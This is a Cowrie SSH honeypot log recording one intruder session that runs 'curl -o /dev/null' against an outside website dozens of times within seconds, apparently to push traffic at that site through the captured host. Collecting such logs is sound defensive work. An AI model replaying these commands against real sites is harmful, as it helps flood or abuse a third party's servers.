{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.507838Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.558271Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.559945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.602906Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.604074Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.642994Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.644591Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.685379Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.687218Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.821495Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.822630Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.868873Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.870085Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.907267Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.908832Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.945664Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.946753Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:39.987817Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:39.988945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.025676Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.026699Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.073773Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.074772Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.111558Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.112482Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.149192Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.150089Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.192095Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.193040Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.229427Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.230394Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.267900Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.268952Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.307895Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.308950Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.345254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.346437Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.388157Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.389080Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.425480Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.426377Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.472880Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.474067Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.510911Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.511882Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.552466Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.553547Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.592671Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.593732Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.630309Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.631268Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.674056Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.675128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.712308Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.713317Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.752714Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.753697Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.790445Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.791428Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.828811Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.829796Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.900152Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.901628Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.939438Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.940527Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:40.979201Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:40.980223Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.016827Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.017861Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.060175Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.061620Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.100672Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.101789Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.143519Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.144671Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.182038Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.183905Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.220757Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.221758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.258897Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.259962Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.307303Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.308642Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.348568Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.349758Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.388414Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.389452Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.428808Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.430295Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.467146Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.468066Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.507902Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.508915Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.551281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.552286Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.588683Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.589461Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.627222Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.628235Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.666088Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.667097Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.716734Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.717778Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.756256Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.757291Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.798829Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.799909Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.839417Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.840565Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.877790Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.879286Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.916862Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.917947Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.960629Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:41.961854Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:41.999333Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.000894Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.038750Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.039858Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.081997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.083180Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.133698Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.135193Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.172615Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.173676Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.213834Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.214929Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.253828Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:40:42.254991Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:40:42.292655Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
